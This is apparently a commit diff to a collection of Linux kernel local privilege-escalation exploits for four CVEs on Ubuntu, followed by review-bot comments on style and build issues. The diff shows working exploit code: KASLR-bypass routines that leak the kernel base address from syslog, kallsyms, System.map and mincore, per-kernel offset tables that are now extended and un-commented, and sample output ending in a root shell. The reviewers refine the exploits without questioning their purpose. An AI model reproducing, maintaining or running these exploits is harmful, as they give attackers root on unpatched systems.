Define KERNEL_BASE_MIN and KERNEL_BASE_MAX
bcoles committed Dec 28, 2019
1 parent 97ddd74 commit d9fbb39
Showing 4 changed files with 82 additions and 56 deletions.
41 changes: 26 additions & 15 deletions CVE-2016-8655/chocobo_root.c
@@ -1,7 +1,7 @@
/*
chocobo_root.c
linux AF_PACKET race condition exploit for CVE-2016-8655.
Includes KASLR and SMEP bypasses.
Includes KASLR and SMEP bypasses. No SMAP bypass.
For Ubuntu 14.04 / 16.04 (x86_64) kernels 4.4.0 before 4.4.0-53.74.
All kernel offsets have been tested on Ubuntu / Linux Mint.
Expand Down Expand Up @@ -114,6 +114,8 @@ Updated by <[email protected]>
#define ENABLE_KASLR_BYPASS 1

#if ENABLE_KASLR_BYPASS
# define KERNEL_BASE_MIN 0xffffffff00000000ul
# define KERNEL_BASE_MAX 0xffffffffff000000ul
# define ENABLE_KASLR_BYPASS_KALLSYMS 1
# define ENABLE_KASLR_BYPASS_SYSMAP 1
# define ENABLE_KASLR_BYPASS_SYSLOG 1
Expand Down Expand Up @@ -666,6 +668,7 @@ void detect_versions() {
}

// * * * * * * * * * * * * * * syslog KASLR bypass * * * * * * * * * * * * * *
// https://github.com/xairy/kernel-exploits/blob/master/CVE-2017-1000112/poc.c

#if ENABLE_KASLR_BYPASS_SYSLOG
#define SYSLOG_ACTION_READ_ALL 3
Expand Down Expand Up @@ -694,30 +697,34 @@ int mmap_syslog(char** buffer, int* size) {
unsigned long get_kernel_addr_trusty(char* buffer, int size) {
const char* needle1 = "Freeing unused";
char* substr = (char*)memmem(&buffer[0], size, needle1, strlen(needle1));
if (substr == NULL) return 0;
if (substr == NULL)
return 0;

int start = 0;
int end = 0;
for (end = start; substr[end] != '-'; end++);

const char* needle2 = "ffffff";
substr = (char*)memmem(&substr[start], end - start, needle2, strlen(needle2));
if (substr == NULL) return 0;
if (substr == NULL)
return 0;

char* endptr = &substr[16];
unsigned long r = strtoul(&substr[0], &endptr, 16);
unsigned long addr = strtoul(&substr[0], &endptr, 16);

r &= 0xffffffffff000000ul;
addr &= 0xffffffffff000000ul;

return r;
if (addr > KERNEL_BASE_MIN && addr < KERNEL_BASE_MAX)
return addr;

return 0;
}

unsigned long get_kernel_addr_xenial(char* buffer, int size) {
const char* needle1 = "Freeing unused";
char* substr = (char*)memmem(&buffer[0], size, needle1, strlen(needle1));
if (substr == NULL) {
if (substr == NULL)
return 0;
}

int start = 0;
int end = 0;
Expand All @@ -726,17 +733,19 @@ unsigned long get_kernel_addr_xenial(char* buffer, int size) {

const char* needle2 = "ffffff";
substr = (char*)memmem(&substr[start], end - start, needle2, strlen(needle2));
if (substr == NULL) {
if (substr == NULL)
return 0;
}

char* endptr = &substr[16];
unsigned long r = strtoul(&substr[0], &endptr, 16);
unsigned long addr = strtoul(&substr[0], &endptr, 16);

r &= 0xfffffffffff00000ul;
r -= 0x1000000ul;
addr &= 0xfffffffffff00000ul;
addr -= 0x1000000ul;

return r;
if (addr > KERNEL_BASE_MIN && addr < KERNEL_BASE_MAX)
return addr;

return 0;
}

unsigned long get_kernel_addr_syslog() {
Expand All @@ -762,6 +771,7 @@ unsigned long get_kernel_addr_syslog() {
#endif

// * * * * * * * * * * * * * * kallsyms KASLR bypass * * * * * * * * * * * * * *
// https://grsecurity.net/~spender/exploits/exploit.txt

#if ENABLE_KASLR_BYPASS_KALLSYMS
unsigned long get_kernel_addr_kallsyms() {
Expand Down Expand Up @@ -799,6 +809,7 @@ unsigned long get_kernel_addr_kallsyms() {
#endif

// * * * * * * * * * * * * * * System.map KASLR bypass * * * * * * * * * * * * * *
// https://grsecurity.net/~spender/exploits/exploit.txt

#if ENABLE_KASLR_BYPASS_SYSMAP
unsigned long get_kernel_addr_sysmap() {
Expand Down Expand Up @@ -868,7 +879,7 @@ unsigned long get_kernel_addr_mincore() {
for (n = 0; n < getpagesize() / sizeof(unsigned char); n++) {
addr = *(unsigned long*)(&buf[n]);
/* Kernel address space */
if (addr > 0xffffffff00000000 && addr < 0xffffffffff000000) {
if (addr > KERNEL_BASE_MIN && addr < KERNEL_BASE_MAX) {
addr &= 0xffffffffff000000ul;
if (munmap((void*)0x66000000, 0x20000000000))
dprintf("[-] munmap(): %m\n");
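Review bot: KERNEL_BASE_MIN and KERNEL_BASE_MAX are introduced inside the `#if ENABLE_KASLR_BYPASS` block (hunk at 114), yet the new condition in get_kernel_addr_mincore() (hunk at 868) uses them; unless that function is also compiled only under the same guard, which this excerpt does not show, a build with `ENABLE_KASLR_BYPASS` set to 0 fails on an undeclared identifier, and the same layout is used in CVE-2017-1000112/poc.c and CVE-2018-5333/cve-2018-5333.c. Moving the two `# define` lines above the `#if` keeps them available in either configuration. The test `addr > KERNEL_BASE_MIN && addr < KERNEL_BASE_MAX` now appears three times in this file and again in CVE-2017-1000112/poc.c, CVE-2017-7308/poc.c and CVE-2018-5333/cve-2018-5333.c; a `static inline int is_kernel_base_candidate(unsigned long addr)` placed next to the defines would give the rule a single home. Note also that the mask `0xffffffffff000000ul` applied just before the check has the same value as KERNEL_BASE_MAX but a different role (alignment), and because the upper bound is strict a trusty value that masks to exactly that constant is rejected; a separately named constant such as `# define KERNEL_BASE_MASK 0xffffffffff000000ul` would make the coincidence explicit.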
44 changes: 25 additions & 19 deletions CVE-2017-1000112/poc.c
Expand Up @@ -13,6 +13,7 @@
// ---
// $ gcc poc.c -o pwn -Wall
// $ ./pwn
// Linux Kernel UDP Fragmentation Offset (UFO) out-of-bounds write local root (CVE-2017-1000112)
// [.] checking kernel version...
// [.] kernel version '4.8.0-58-generic' detected
// [~] done, version looks good
Expand Down Expand Up @@ -85,6 +86,8 @@
#define ENABLE_SMEP_BYPASS 1

#if ENABLE_KASLR_BYPASS
# define KERNEL_BASE_MIN 0xffffffff00000000ul
# define KERNEL_BASE_MAX 0xffffffffff000000ul
# define ENABLE_KASLR_BYPASS_KALLSYMS 1
# define ENABLE_KASLR_BYPASS_SYSMAP 1
# define ENABLE_KASLR_BYPASS_SYSLOG 1
Expand Down Expand Up @@ -192,7 +195,6 @@ struct kernel_info kernels[] = {
{ "xenial", "4.8.0-56-generic", 0xa5d00, 0xa60f0, 0x17c55, 0x39d50d, 0x119207, 0x1b170, 0x43a14a, 0x44d4a0, 0x7bd03, 0x12c7d7, 0x64210, 0x49f60 },
{ "xenial", "4.8.0-58-generic", 0xa5d20, 0xa6110, 0x17c55, 0xe56f5, 0x119227, 0x1b170, 0x439e7a, 0x162622, 0x7bd23, 0x12c7f7, 0x64210, 0x49fa0 },

/* Untested:
{ "xenial", "4.8.0-34-lowlatency", 0xa6ed0, 0xa72e0, 0x8d, 0x12e349, 0x11c837, 0x1b3d0, 0x4426aa, 0x4bfe3, 0x7c8c3, 0x130367, 0x64910, 0x4b7d0 },
{ "xenial", "4.8.0-36-lowlatency", 0xa6ed0, 0xa72e0, 0x8d, 0x12e349, 0x11c837, 0x1b3d0, 0x4426aa, 0x4bfe3, 0x7c8c3, 0x130367, 0x64910, 0x4b7d0 },
{ "xenial", "4.8.0-39-lowlatency", 0xa6ec0, 0xa72d0, 0x8d, 0x76172, 0x11c837, 0x1b310, 0x442f8a, 0x108ea3, 0x7c8c3, 0x130367, 0x64910, 0x4b7c0 },
Expand All @@ -202,10 +204,8 @@ struct kernel_info kernels[] = {
{ "xenial", "4.8.0-45-lowlatency", 0xa6ec0, 0xa72d0, 0x8d, 0x46c32c, 0x11c837, 0x1b310, 0x442fba, 0x108ea3, 0x7c8c3, 0x130357, 0x64910, 0x4b7c0 },
{ "xenial", "4.8.0-46-lowlatency", 0xa6ec0, 0xa72d0, 0x8d, 0x46c32c, 0x11c837, 0x1b310, 0x442fba, 0x108ea3, 0x7c8c3, 0x130357, 0x64910, 0x4b7c0 },
{ "xenial", "4.8.0-49-lowlatency", 0xa6ed0, 0xa72e0, 0x8d, 0x12e349, 0x11c847, 0x1b310, 0x44312a, 0x41d233, 0x7c8d3, 0x130367, 0x64910, 0x4b7c0 },
{ "xenial", "4.8.0-51-lowlatency", 0xa6ed0, 0xa72e0, 0x8d, 0x12e349, 0x11c847, 0x1b310, 0x44312a, 0x41d233, 0x7c8d3, 0x130367, 0x64910, 0x4b7c0 },
//{ "xenial", "4.8.0-51-lowlatency", 0xa6ed0, 0xa72e0, 0x8d, 0x12e349, 0x11c847, 0x1b310, 0x44312a, 0x41d233, 0x7c8d3, 0x130367, 0x64910, 0x4b7c0 },
{ "xenial", "4.8.0-52-lowlatency", 0xa6ed0, 0xa72e0, 0x8d, 0x12e349, 0x11c847, 0x1b310, 0x44365a, 0x41d763, 0x7c8d3, 0x130367, 0x64910, 0x4b7c0 },
*/

{ "xenial", "4.8.0-53-lowlatency", 0xa6ed0, 0xa72e0, 0x8d, 0xdf526, 0x11c847, 0x1b310, 0x44365a, 0x41d763, 0x7c8d3, 0x130367, 0x64910, 0x4b7c0 },
{ "xenial", "4.8.0-54-lowlatency", 0xa6ed0, 0xa72e0, 0x8d, 0x1b061d, 0x11c847, 0x1b310, 0x44365a, 0x2e791c, 0x7c8d3, 0x130367, 0x64910, 0x4b7c0 },
{ "xenial", "4.8.0-56-lowlatency", 0xa6ed0, 0xa72e0, 0x8d, 0xda43e, 0x11c847, 0x1b310, 0x4436aa, 0x2e796c, 0x7c8d3, 0x130367, 0x64910, 0x4b7c0 },
Expand Down Expand Up @@ -589,30 +589,34 @@ int mmap_syslog(char** buffer, int* size) {
unsigned long get_kernel_addr_trusty(char* buffer, int size) {
const char* needle1 = "Freeing unused";
char* substr = (char*)memmem(&buffer[0], size, needle1, strlen(needle1));
if (substr == NULL) return 0;
if (substr == NULL)
return 0;

int start = 0;
int end = 0;
for (end = start; substr[end] != '-'; end++);

const char* needle2 = "ffffff";
substr = (char*)memmem(&substr[start], end - start, needle2, strlen(needle2));
if (substr == NULL) return 0;
if (substr == NULL)
return 0;

char* endptr = &substr[16];
unsigned long r = strtoul(&substr[0], &endptr, 16);
unsigned long addr = strtoul(&substr[0], &endptr, 16);

addr &= 0xffffffffff000000ul;

r &= 0xffffffffff000000ul;
if (addr > KERNEL_BASE_MIN && addr < KERNEL_BASE_MAX)
return addr;

return r;
return 0;
}

unsigned long get_kernel_addr_xenial(char* buffer, int size) {
const char* needle1 = "Freeing unused";
char* substr = (char*)memmem(&buffer[0], size, needle1, strlen(needle1));
if (substr == NULL) {
if (substr == NULL)
return 0;
}

int start = 0;
int end = 0;
Expand All @@ -621,17 +625,19 @@ unsigned long get_kernel_addr_xenial(char* buffer, int size) {

const char* needle2 = "ffffff";
substr = (char*)memmem(&substr[start], end - start, needle2, strlen(needle2));
if (substr == NULL) {
if (substr == NULL)
return 0;
}

char* endptr = &substr[16];
unsigned long r = strtoul(&substr[0], &endptr, 16);
unsigned long addr = strtoul(&substr[0], &endptr, 16);

r &= 0xfffffffffff00000ul;
r -= 0x1000000ul;
addr &= 0xfffffffffff00000ul;
addr -= 0x1000000ul;

return r;
if (addr > KERNEL_BASE_MIN && addr < KERNEL_BASE_MAX)
return addr;

return 0;
}

unsigned long get_kernel_addr_syslog() {
Expand Down Expand Up @@ -893,7 +899,7 @@ unsigned long get_kernel_addr_mincore() {
for (n = 0; n < getpagesize() / sizeof(unsigned char); n++) {
addr = *(unsigned long*)(&buf[n]);
/* Kernel address space */
if (addr > 0xffffffff00000000 && addr < 0xffffffffff000000) {
if (addr > KERNEL_BASE_MIN && addr < KERNEL_BASE_MAX) {
addr &= 0xffffffffff000000ul;

if (munmap((void*)0x66000000, 0x20000000000))
Expand Down Expand Up @@ -979,7 +985,7 @@ void setup_sandbox() {
exit(EXIT_FAILURE);
}
if (unshare(CLONE_NEWNET) != 0) {
dprintf("[-] unshare(CLONE_NEWUSER): %m\n");
dprintf("[-] unshare(CLONE_NEWNET): %m\n");
exit(EXIT_FAILURE);
}

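Review bot: As far as the rendered hunks at 192 and 202 show, the `/* Untested:` comment and its closing `*/` around the lowlatency entries of `kernels[]` are removed, so every entry except 4.8.0-51 (now `//`-commented) becomes a live table row, which the commit title about KERNEL_BASE_MIN/MAX does not cover. If those offsets were verified since the comment was written, a one-line comment above the block saying how they were verified records that; otherwise the table change is better split into its own commit with that evidence in its message. Leaving a single entry `//`-commented in the middle of the table without a reason also deserves a short comment, e.g. `// 4.8.0-51-lowlatency: offsets not verified`.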
31 changes: 17 additions & 14 deletions CVE-2017-7308/poc.c
Expand Up @@ -7,7 +7,7 @@
//
// https://github.com/xairy/kernel-exploits/tree/master/CVE-2017-7308
// ---
// $ gcc poc.c -o pwn
// $ gcc poc.c -o pwn -Wall
// $ ./pwn
// Linux Kernel AF_PACKET packet_set_ring heap out-of-bounds write local root (CVE-2017-7308)
// [.] checking kernel version
Expand Down Expand Up @@ -93,6 +93,8 @@
#define ENABLE_SMEP_SMAP_BYPASS 1

#if ENABLE_KASLR_BYPASS
# define KERNEL_BASE_MIN 0xffffffff00000000ul
# define KERNEL_BASE_MAX 0xffffffffff000000ul
# define ENABLE_KASLR_BYPASS_KALLSYMS 1
# define ENABLE_KASLR_BYPASS_SYSMAP 1
# define ENABLE_KASLR_BYPASS_SYSLOG 1
Expand Down Expand Up @@ -324,7 +326,7 @@ void oob_timer_execute(void *func, unsigned long arg) {
}

void oob_id_match_execute(void *func) {
int s = oob_setup(2048 + XMIT_OFFSET - 64);
oob_setup(2048 + XMIT_OFFSET - 64);

int ps[32];

Expand Down Expand Up @@ -513,7 +515,7 @@ unsigned long get_kernel_addr_syslog_xenial() {
int size = klogctl(SYSLOG_ACTION_SIZE_BUFFER, 0, 0);
if (size == -1) {
dprintf("[-] klogctl(SYSLOG_ACTION_SIZE_BUFFER): %m\n");
exit(EXIT_FAILURE);
return 0;
}

size = (size / getpagesize() + 1) * getpagesize();
Expand All @@ -523,30 +525,31 @@ unsigned long get_kernel_addr_syslog_xenial() {
size = klogctl(SYSLOG_ACTION_READ_ALL, &buffer[0], size);
if (size == -1) {
dprintf("[-] klogctl(SYSLOG_ACTION_READ_ALL): %m\n");
exit(EXIT_FAILURE);
return 0;
}

const char *needle1 = "Freeing SMP";
char *substr = (char *)memmem(&buffer[0], size, needle1, strlen(needle1));
if (substr == NULL) {
exit(EXIT_FAILURE);
}
if (substr == NULL)
return 0;

for (size = 0; substr[size] != '\n'; size++);

const char *needle2 = "ffff";
substr = (char *)memmem(&substr[0], size, needle2, strlen(needle2));
if (substr == NULL) {
exit(EXIT_FAILURE);
}
if (substr == NULL)
return 0;

char *endptr = &substr[16];
unsigned long r = strtoul(&substr[0], &endptr, 16);
unsigned long addr = strtoul(&substr[0], &endptr, 16);

addr &= 0xfffffffffff00000ul;
addr -= 0x1000000ul;

r &= 0xfffffffffff00000ul;
r -= 0x1000000ul;
if (addr > KERNEL_BASE_MIN && addr < KERNEL_BASE_MAX)
return addr;

return r;
return 0;
}
#endif

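Review bot: The new `return 0` paths in get_kernel_addr_syslog_xenial() (hunks at 513 and 523) replace `exit(EXIT_FAILURE)`, so the buffer prepared in the collapsed lines 523–525 is now left behind on every early exit where process termination previously made cleanup moot; if it is malloc'd or mmap'd, as the `&buffer[0]` passed to klogctl() suggests, release it before returning, for instance by routing the failure paths through one label that frees or unmaps it and then returns 0, and release it on the success path as well once `addr` has been computed. The function starts before the first hunk, so the allocation itself is not visible here. In oob_id_match_execute() (hunk at 324) the value of oob_setup() is now discarded; if it is a descriptor, as the dropped name `s` hints, this silences -Wall but leaks the handle, so either keep and `close()` it or write `(void)oob_setup(2048 + XMIT_OFFSET - 64); /* handle intentionally left open */` so the intent is documented.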
22 changes: 14 additions & 8 deletions CVE-2018-5333/cve-2018-5333.c
Expand Up @@ -75,7 +75,7 @@
// [.] prepare_kernel_cred: ffffffff9f0a50e0
// [.] mmapping fake stack...
// [~] done, fake stack mmapped
// [.] executing payload 402119...
// [.] executing payload 0x402119...
// [+] got root
// # id
// uid=0(root) gid=0(root) groups=0(root)
Expand Down Expand Up @@ -116,6 +116,8 @@
#define ENABLE_KASLR_BYPASS 1

#if ENABLE_KASLR_BYPASS
# define KERNEL_BASE_MIN 0xffffffff00000000ul
# define KERNEL_BASE_MAX 0xffffffffff000000ul
# define ENABLE_KASLR_BYPASS_KALLSYMS 1
# define ENABLE_KASLR_BYPASS_SYSMAP 1
# define ENABLE_KASLR_BYPASS_SYSLOG 1
Expand Down Expand Up @@ -149,6 +151,7 @@ struct kernel_info kernels[] = {
{ "4.4.0-21-generic #37-Ubuntu", 0xa21c0, 0xa25b0, 0x5d0c5, 0x178157, 0x3f8158, 0x64644, 0x4cc7da },
{ "4.4.0-22-generic #40-Ubuntu", 0xa2220, 0xa2610, 0x5d0c5, 0x178217, 0x3f89e8, 0x64644, 0x7d005 },
{ "4.4.0-24-generic #43-Ubuntu", 0xa2340, 0xa2730, 0x5d0c5, 0x178447, 0x3f98b8, 0x64644, 0x7d125 },
{ "4.4.0-28-generic #47-Ubuntu", 0xa24a0, 0xa2890, 0x5d0c5, 0x178717, 0x3f9f38, 0x64644, 0x585dc },
{ "4.4.0-31-generic #50-Ubuntu", 0xa24a0, 0xa2890, 0x5d0c5, 0x1787a7, 0x3ffed8, 0x64644, 0x7d125 },
{ "4.4.0-38-generic #57-Ubuntu", 0xa2570, 0xa2960, 0x5d0c5, 0x178a97, 0x400968, 0x64634, 0x7d1e5 },
{ "4.4.0-42-generic #62-Ubuntu", 0xa25c0, 0xa29b0, 0x5d0c5, 0x178ac7, 0x400d78, 0x64634, 0x7d1a5 },
Expand Down Expand Up @@ -563,17 +566,20 @@ unsigned long get_kernel_addr_syslog_xenial(char* buffer, int size) {

const char* needle2 = "ffffff";
substr = (char*)memmem(&substr[start], end - start, needle2, strlen(needle2));
if (substr == NULL) {

if (substr == NULL)
return 0;
}

char* endptr = &substr[16];
unsigned long r = strtoul(&substr[0], &endptr, 16);
unsigned long addr = strtoul(&substr[0], &endptr, 16);

r &= 0xfffffffffff00000ul;
r -= 0x1000000ul;
addr &= 0xfffffffffff00000ul;
addr -= 0x1000000ul;

return r;
if (addr > KERNEL_BASE_MIN && addr < KERNEL_BASE_MAX)
return addr;

return 0;
}

unsigned long get_kernel_addr_syslog() {
Expand Down Expand Up @@ -753,7 +759,7 @@ unsigned long get_kernel_addr_mincore() {
for (n = 0; n < getpagesize() / sizeof(unsigned char); n++) {
addr = *(unsigned long*)(&buf[n]);
/* Kernel address space */
if (addr > 0xffffffff00000000 && addr < 0xffffffffff000000) {
if (addr > KERNEL_BASE_MIN && addr < KERNEL_BASE_MAX) {
addr &= 0xffffffffff000000ul;
if (munmap((void*)0x66000000, 0x20000000000))
dprintf("[-] munmap(): %m\n");
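Review bot: The hunk at 563 leaves a blank line between the memmem() call and its new `if (substr == NULL)` check, which none of the equivalent blocks in the other three files have; drop it so the four copies stay in step. The same hunk also trades the braced single-statement `if` for the brace-less two-line form while the file keeps both styles (`if (munmap(...))` at 759 is brace-less, the `if (addr > KERNEL_BASE_MIN && addr < KERNEL_BASE_MAX) {` in get_kernel_addr_mincore() is braced); pick one and apply it across the syslog helpers. The enclosing get_kernel_addr_syslog_xenial() starts before the hunk.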
